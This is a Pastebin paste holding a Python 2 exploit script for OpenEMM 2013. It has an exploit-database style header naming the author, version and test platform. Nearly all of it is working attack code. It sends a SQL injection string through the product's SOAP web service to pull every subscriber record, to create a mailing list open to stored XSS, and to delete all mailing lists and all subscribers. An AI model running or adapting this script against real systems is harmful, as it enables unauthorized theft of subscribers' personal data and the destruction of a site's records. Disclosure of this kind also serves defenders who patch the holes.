Advertisement
Guest User

openemm sploit

a guest
Jul 23rd, 2013
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.42 KB | None | 0 0
  1. import os
  2. import sys
  3. from SOAPpy import WSDL
  4. from argparse import ArgumentParser
  5. from re import sub
  6.  
  7. # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
  8. # Date: 07/20/2013
  9. # Exploit Author: drone (@dronesec)
  10. # Vendor Homepage: http://www.openemm.org/
  11. # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
  12. # Version: 2013 (8.10.380.hf13.0.066)
  13. # Tested on: Ubuntu 12.04
  14.  
  15. """ Exploits a host of vulnerabilities discovered in OpenEMM.
  16.    Required ws.wsdl file should be in local directory.
  17. """
  18. def run(options):
  19.     """ run exploit
  20.    """
  21.     wsdl_file = "./ws.wsdl"
  22.     sploit = "\\' OR 1=1;-- "
  23.  
  24.     _server = WSDL.Proxy(wsdl_file)
  25.  
  26.     if options.subscribers:
  27.         # iterate until we get a null response
  28.         idx = 1
  29.         while True:
  30.             ret = _server.getSubscriber("wsadmin", sploit, idx)
  31.             if ret.paramValues == '':
  32.                 print '[!] Discovered %d subscribers'%(idx-1)
  33.                 break
  34.  
  35.             print ret.paramValues
  36.             idx += 1
  37.  
  38.     elif options.mlist:
  39.         try:
  40.             print '[!] Description field vulnerable to stored xss!'
  41.             description = raw_input('[!] Enter mlist description: ')
  42.         except:
  43.             description = ''
  44.  
  45.         ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
  46.         if ret > 0: print '[!] Saved successfully'
  47.         else:       print '[!] Save unsuccessful'
  48.  
  49.     elif options.dmlist:
  50.         print '[!] Deleting all mailing lists...'
  51.         idx = 1
  52.         while True:
  53.             ret = _server.deleteMailinglist('wsadmin', sploit, idx)
  54.             if ret == 0:
  55.                 print '[!] Deleted %d mailing lists.'%idx
  56.                 break
  57.             idx += 1
  58.  
  59.     elif options.dsubs:
  60.         print '[!] Deleting all subscribers...'
  61.         idx = 1
  62.         while True:
  63.             ret = _server.deleteSubscriber('wsadmin', sploit, idx)
  64.             if ret == 0:
  65.                 print '[!] Deleted %d subscribers.'%idx
  66.                 break
  67.             idx += 1
  68.  
  69. def parse_args():
  70.     """ parse args and sub in the desired IP
  71.    """
  72.     parser = ArgumentParser()
  73.     parser.add_argument('-i', help='server address', action='store',
  74.                 dest='host', required=True)
  75.     parser.add_argument('-s', help='fetch all subscribers', action='store_true',
  76.                 dest='subscribers')
  77.     parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
  78.                 dest='mlist')
  79.     parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
  80.                 dest='dmlist')
  81.     parser.add_argument('--ds', help='delete all subscribers', action='store_true',
  82.                 dest='dsubs')
  83.  
  84.     options = parser.parse_args()
  85.     try:
  86.         # sub in server address
  87.         with open('ws.wsdl', 'r') as f:
  88.             out = open('tmp.wsdl', 'w+')
  89.             for line in f:
  90.                 line = sub('location="(.*?)"',
  91.                     'location="http://{0}:8080/emm_webservice"'.format(options.host),
  92.                     line)
  93.                 out.write(line)
  94.             out.close()
  95.     except IOError:
  96.         print '[-] ws.wsdl not found'
  97.         sys.exit(1)
  98.  
  99.     # replace ws.wsdl with temp one
  100.     os.system('mv tmp.wsdl ws.wsdl')
  101.     return options
  102.  
  103. if __name__ == "__main__":
  104.     options = parse_args()
  105.     run(options)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement